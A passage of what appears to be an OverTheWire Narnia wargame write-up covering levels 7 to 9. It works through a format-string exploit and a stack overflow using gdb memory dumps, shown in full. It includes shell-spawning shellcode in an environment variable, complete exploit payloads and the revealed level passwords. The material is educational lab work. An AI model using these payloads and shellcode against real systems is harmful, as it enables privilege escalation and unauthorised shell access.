goodfunction() = 0x80486ff
hackedfunction() = 0x8048724

before : ptrf() = 0x80486ff (0xffffd638)
I guess you want to come to the hackedfunction...
Segmentation fault
# Nope...

narnia7@narnia:/narnia$ ./narnia7 $(python -c 'print "\x38\xd6\xff\xff" + "%134514464d%2$n"')
goodfunction() = 0x80486ff
hackedfunction() = 0x8048724

before : ptrf() = 0x80486ff (0xffffd638)
I guess you want to come to the hackedfunction...
Way to go!!!!$
$ whoami
narnia8
$ cat /etc/narnia_pass/narnia8
mohthuphog

On the second try !

Narnia 08 Solution

SSH : ssh narnia8@narnia.labs.overthewire.org -p 2226
Pass : mohthuphog

First, let’s try to execute the program…

$ ssh narnia8@narnia.labs.overthewire.org -p 2226

narnia8@narnia:~$ cd /narnia/
narnia8@narnia:/narnia$ ./narnia8
./narnia8 argument
narnia8@narnia:/narnia$ ./narnia8 test
test

The program just print back our input.

Source Code

Let’s take a look at the source :

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int i;

void func(char *b){
	char *blah=b;
	char bok[20];
	//int i=0;

	memset(bok, '\0', sizeof(bok));
	for(i=0; blah[i] != '\0'; i++)
		bok[i]=blah[i];

	printf("%s\n",bok);
}

int main(int argc, char **argv){

	if(argc > 1)
		func(argv[1]);
	else
	printf("%s argument\n", argv[0]);

	return 0;
}

Here we have a potential overflow in the bok variable, but if we try to overflow it we got some weird results :

narnia8@narnia:/narnia$ ./narnia8 $(python -c 'print 20 * "A"')
AAAAAAAAAAAAAAAAAAAA�������������
narnia8@narnia:/narnia$ ./narnia8 $(python -c 'print 21 * "A"')
Segmentation fault

We need to dig deeper, place a breakpoint at printf() in the func() function and run the code…

narnia8@narnia:/narnia$ gdb narnia8

(gdb) set disassembly-flavor intel
(gdb) disas func
Dump of assembler code for function func:
   0x0804841b <+0>:	push   ebp
   0x0804841c <+1>:	mov    ebp,esp
   0x0804841e <+3>:	sub    esp,0x18
   0x08048421 <+6>:	mov    eax,DWORD PTR [ebp+0x8]
   0x08048424 <+9>:	mov    DWORD PTR [ebp-0x4],eax
   
...[removed]...

   0x0804847f <+100>:	push   eax
   0x08048480 <+101>:	push   0x8048550
   0x08048485 <+106>:	call   0x80482e0 <printf@plt>
   0x0804848a <+111>:	add    esp,0x8
   0x0804848d <+114>:	nop
   0x0804848e <+115>:	leave
   0x0804848f <+116>:	ret
End of assembler dump.

(gdb) break *func+106
Breakpoint 1 at 0x8048485

(gdb) run $(python -c 'print 20 * "A"')
Starting program: /narnia/narnia8 $(python -c 'print 20 * "A"')

Breakpoint 1, 0x08048485 in func ()
(gdb) x/16wx $esp
0xffffd66c:	0x08048550	0xffffd674	0x41414141	0x41414141
0xffffd67c:	0x41414141	0x41414141	0x41414141	0xffffd871
0xffffd68c:	0xffffd698	0x080484a7	0xffffd871	0x00000000
0xffffd69c:	0xf7e2a286	0x00000002	0xffffd734	0xffffd740

(gdb) run $(python -c 'print 21 * "A"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 $(python -c 'print 21 * "A"')

Breakpoint 1, 0x08048485 in func ()
(gdb) x/16wx $esp
0xffffd66c:	0x08048550	0xffffd674	0x41414141	0x41414141
0xffffd67c:	0x41414141	0x41414141	0x41414141	0xffffc541
0xffffd68c:	0xffffd698	0x080484a7	0xffffd870	0x00000000
0xffffd69c:	0xf7e2a286	0x00000002	0xffffd734	0xffffd740

(gdb) run $(python -c 'print 22 * "A"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 $(python -c 'print 22 * "A"')

Breakpoint 1, 0x08048485 in func ()
(gdb) x/16wx $esp
0xffffd65c:	0x08048550	0xffffd664	0x41414141	0x41414141
0xffffd66c:	0x41414141	0x41414141	0x41414141	0xffffd841
0xffffd67c:	0xffffd688	0x080484a7	0xffffd86f	0x00000000
0xffffd68c:	0xf7e2a286	0x00000002	0xffffd724	0xffffd730

As you can see, I increased the size of the input for each stack dump. The second one shows that we overwrote 1 byte of the 8th value (from 0xffffd871 to 0xffffc541), but it seems that we can’t overwrite more bytes…

We also note that the 8th and 11th values are the addresses of our input and the 10th value is the return address:

(gdb) run $(python -c 'print 20 * "A"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 $(python -c 'print 20 * "A"')

Breakpoint 1, 0x08048485 in func ()
(gdb) x/16wx $esp
0xffffd66c:	0x08048550	0xffffd674	0x41414141	0x41414141
0xffffd67c:	0x41414141	0x41414141	0x41414141	0xffffd871
0xffffd68c:	0xffffd698	0x080484a7	0xffffd871	0x00000000
0xffffd69c:	0xf7e2a286	0x00000002	0xffffd734	0xffffd740
(gdb) x/s 0xffffd871
0xffffd871:	'A' <repeats 20 times>

Check the following dump, the address 0x080484a7 is in fact the return address to main() at the following line 0x080484a7 <+23>: add esp,0x4.

(gdb) run $(python -c 'print 20 * "A"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 $(python -c 'print 20 * "A"')

Breakpoint 2, 0x08048485 in func ()
(gdb) x/20xw $esp
0xffffd66c:	0x08048550	0xffffd674	0x41414141	0x41414141
0xffffd67c:	0x41414141	0x41414141	0x41414141	0xffffd871
0xffffd68c:	0xffffd698	0x080484a7	0xffffd871	0x00000000
0xffffd69c:	0xf7e2a286	0x00000002	0xffffd734	0xffffd740
0xffffd6ac:	0x00000000	0x00000000	0x00000000	0xf7fc5000
(gdb) disas main
Dump of assembler code for function main:
   0x08048490 <+0>:	push   ebp
   0x08048491 <+1>:	mov    ebp,esp
   0x08048493 <+3>:	cmp    DWORD PTR [ebp+0x8],0x1
   0x08048497 <+7>:	jle    0x80484ac <main+28>
   0x08048499 <+9>:	mov    eax,DWORD PTR [ebp+0xc]
   0x0804849c <+12>:	add    eax,0x4
   0x0804849f <+15>:	mov    eax,DWORD PTR [eax]
   0x080484a1 <+17>:	push   eax
   0x080484a2 <+18>:	call   0x804841b <func>
   0x080484a7 <+23>:	add    esp,0x4
   0x080484aa <+26>:	jmp    0x80484bf <main+47>
   0x080484ac <+28>:	mov    eax,DWORD PTR [ebp+0xc]
   0x080484af <+31>:	mov    eax,DWORD PTR [eax]
   0x080484b1 <+33>:	push   eax
   0x080484b2 <+34>:	push   0x8048554
   0x080484b7 <+39>:	call   0x80482e0 <printf@plt>
   0x080484bc <+44>:	add    esp,0x8
   0x080484bf <+47>:	mov    eax,0x0
   0x080484c4 <+52>:	leave
   0x080484c5 <+53>:	ret
End of assembler dump.
(gdb)

Okay, let’s try to restore the original pointer to our string, here it’s 0xffffd871 :

(gdb) run $(python -c 'print 20 * "A"')
Starting program: /narnia/narnia8 $(python -c 'print 20 * "A"')

Breakpoint 1, 0x08048485 in func ()
(gdb) x/16x $esp
0xffffd66c:	0x08048550	0xffffd674	0x41414141	0x41414141
0xffffd67c:	0x41414141	0x41414141	0x41414141	0xffffd871
0xffffd68c:	0xffffd698	0x080484a7	0xffffd871	0x00000000
0xffffd69c:	0xf7e2a286	0x00000002	0xffffd734	0xffffd740

So, let’s add 1 byte to the payload (0x71)

(gdb) run $(python -c 'print 20 * "A" + "\x71"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 $(python -c 'print 20 * "A" + "\x71"')

Breakpoint 1, 0x08048485 in func ()
(gdb) x/16x $esp
0xffffd66c:	0x08048550	0xffffd674	0x41414141	0x41414141
0xffffd67c:	0x41414141	0x41414141	0x41414141	0xffff4c71
0xffffd68c:	0xffffd698	0x080484a7	0xffffd870	0x00000000
0xffffd69c:	0xf7e2a286	0x00000002	0xffffd734	0xffffd740

Hum, the orginal address shifted down to 0xffffd870, let’s fix that :

(gdb) run $(python -c 'print 20 * "A" + "\x70"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 $(python -c 'print 20 * "A" + "\x70"')

Breakpoint 1, 0x08048485 in func ()
(gdb) x/16x $esp
0xffffd66c:	0x08048550	0xffffd674	0x41414141	0x41414141
0xffffd67c:	0x41414141	0x41414141	0x41414141	0xffffd870
0xffffd68c:	0xffffd698	0x080484a7	0xffffd870	0x00000000
0xffffd69c:	0xf7e2a286	0x00000002	0xffffd734	0xffffd740

So far, so good. Let’s add a second byte, 0xd8 :

(gdb) run $(python -c 'print 20 * "A" + "\x70\xd8"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 $(python -c 'print 20 * "A" + "\x70\xd8"')

Breakpoint 1, 0x08048485 in func ()
(gdb) x/16x $esp
0xffffd65c:	0x08048550	0xffffd664	0x41414141	0x41414141
0xffffd66c:	0x41414141	0x41414141	0x41414141	0xffffd870
0xffffd67c:	0xffffd688	0x080484a7	0xffffd86f	0x00000000
0xffffd68c:	0xf7e2a286	0x00000002	0xffffd724	0xffffd730

Okay, the address shifted down again to 0xffffd86f. I followed the pattern util I was able to to overwrite the address of our string and continue to write on the stack :

(gdb) run $(python -c 'print 20 * "A" + "\x69\xd8\xff\xff" + "AAAA"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 $(python -c 'print 20 * "A" + "\x69\xd8\xff\xff" + "AAAA"')

Breakpoint 1, 0x08048485 in func ()
(gdb) x/16x $esp
0xffffd65c:	0x08048550	0xffffd664	0x41414141	0x41414141
0xffffd66c:	0x41414141	0x41414141	0x41414141	0xffffd869
0xffffd67c:	0x41414141	0x080484a7	0xffffd869	0x00000000
0xffffd68c:	0xf7e2a286	0x00000002	0xffffd724	0xffffd730

The trick to remember is that you have to decrease the address of the string by 1 byte each time you add a byte to the payload. Let’s finish that by overwriting the return address :

(gdb) run $(python -c 'print 20 * "A" + "\x65\xd8\xff\xff" + "AAAA" + "CCCC"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 $(python -c 'print 20 * "A" + "\x65\xd8\xff\xff" + "AAAA" + "CCCC"')

Breakpoint 1, 0x08048485 in func ()
(gdb) x/16x $esp
0xffffd65c:	0x08048550	0xffffd664	0x41414141	0x41414141
0xffffd66c:	0x41414141	0x41414141	0x41414141	0xffffd865
0xffffd67c:	0x41414141	0x43434343	0xffffd865	0x00000000
0xffffd68c:	0xf7e2a286	0x00000002	0xffffd724	0xffffd730
(gdb) continue
Continuing.
AAAAAAAAAAAAAAAAAAAAe���AAAACCCCe���

Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) x/x $eip
0x43434343:	Cannot access memory at address 0x43434343

Perfect ! Now, as the buffer is too small for a shellcode, we will use an environment variable and return to it. I used the following one :

export SHELLCODE=$(printf "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80")

Now, we’ll try to execute it in GDB. Note, that the addresses might have shifted so make sure to repeat the previous steps to fix the addresses of our payload.

(gdb) run $(python -c 'print 20 * "A" + "\x47\xd8\xff\xff" + "AAAA" + "CCCC"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 $(python -c 'print 20 * "A" + "\x47\xd8\xff\xff" + "AAAA" + "CCCC"')

Breakpoint 1, 0x08048485 in func ()
(gdb) x/16x $esp
0xffffd63c:	0x08048550	0xffffd644	0x41414141	0x41414141
0xffffd64c:	0x41414141	0x41414141	0x41414141	0xffffd847
0xffffd65c:	0x41414141	0x43434343	0xffffd847	0x00000000
0xffffd66c:	0xf7e2a286	0x00000002	0xffffd704	0xffffd710

Then, we will retreive our environment variable SHELLCODE by repeating the following command x/s *((char **)environ).

(gdb) x/s *((char **)environ)
0xffffd861:	"LC_ALL=en_US.UTF-8"

...[removed]...

(gdb) x/s *((char **)environ)
0xffffde75:	"LANG=en_US.UTF-8"
(gdb) x/s *((char **)environ)
0xffffde86:	"OLDPWD=/tmp"
(gdb) x/s *((char **)environ)
0xffffde92:	"SHELLCODE=1\300\061\333\061ə\260\244̀j\vXQh//shh/bin\211\343Q\211\342S\211\341̀"

Finally, we complete the payload :

(gdb) run $(python -c 'print 20 * "A" + "\x40\xd8\xff\xff" + "AAAA" + "\x92\xde\xff\xff"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 $(python -c 'print 20 * "A" + "\x40\xd8\xff\xff" + "AAAA" + "\x92\xde\xff\xff"')

Breakpoint 1, 0x08048485 in func ()
(gdb) x/16xw $esp
0xffffd63c:	0x08048550	0xffffd644	0x41414141	0x41414141
0xffffd64c:	0x41414141	0x41414141	0x41414141	0xffffd840
0xffffd65c:	0x41414141	0xffffde92	0xffffd840	0x00000000
0xffffd66c:	0xf7e2a286	0x00000002	0xffffd704	0xffffd710
(gdb) conti
Continuing.
AAAAAAAAAAAAAAAAAAAA@���AAAA����@���
process 10478 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "func" in current context.
Error in re-setting breakpoint 1: No symbol "func" in current context.
Error in re-setting breakpoint 1: No symbol "func" in current context.
$ 

Awesome, now we need to do the same outside GDB. First, let’s find the SHELLCODE environment variable with the following code :

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char* argv[])
{
  printf("%s is at %p\n", argv[1], getenv(argv[1]));
}

You can, compile it in /tmp/ :

narnia8@narnia:/narnia$ cd /tmp
narnia8@narnia:/tmp$ gcc -m32 find_addr.c -o find_addr
narnia8@narnia:/tmp$ ./find_addr SHELLCODE
SHELLCODE is at 0xffffdea1

Then, we need to find the pointer of our payload :

narnia8@narnia:/narnia$ ./narnia8  $(python -c 'print 20 * "A"')  | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000010: 4141 4141 6ad8 ffff 98d6 ffff a784 0408  AAAAj...........
00000020: 6ad8 ffff 0a                             j....
narnia8@narnia:/narnia$ python -c 'print "{:8x}".format(0xffffd86a-12)'
ffffd85e
./narnia8 $(python -c 'print 20 * "A" + "\x5e\xd8\xff\xff" + "AAAA" + "\xa1\xde\xff\xff"')
AAAAAAAAAAAAAAAAAAAA^���AAAA����^���
$ whoami
narnia9
$ cat /etc/narnia_pass/narnia9
eiL5fealae

Finally ! This one was kind of hard. It took me a while to figure it out :)

Narnia 09 Solution

SSH : ssh narnia9@narnia.labs.overthewire.org -p 2226
Pass : eiL5fealae

Nothing to do here, we are done !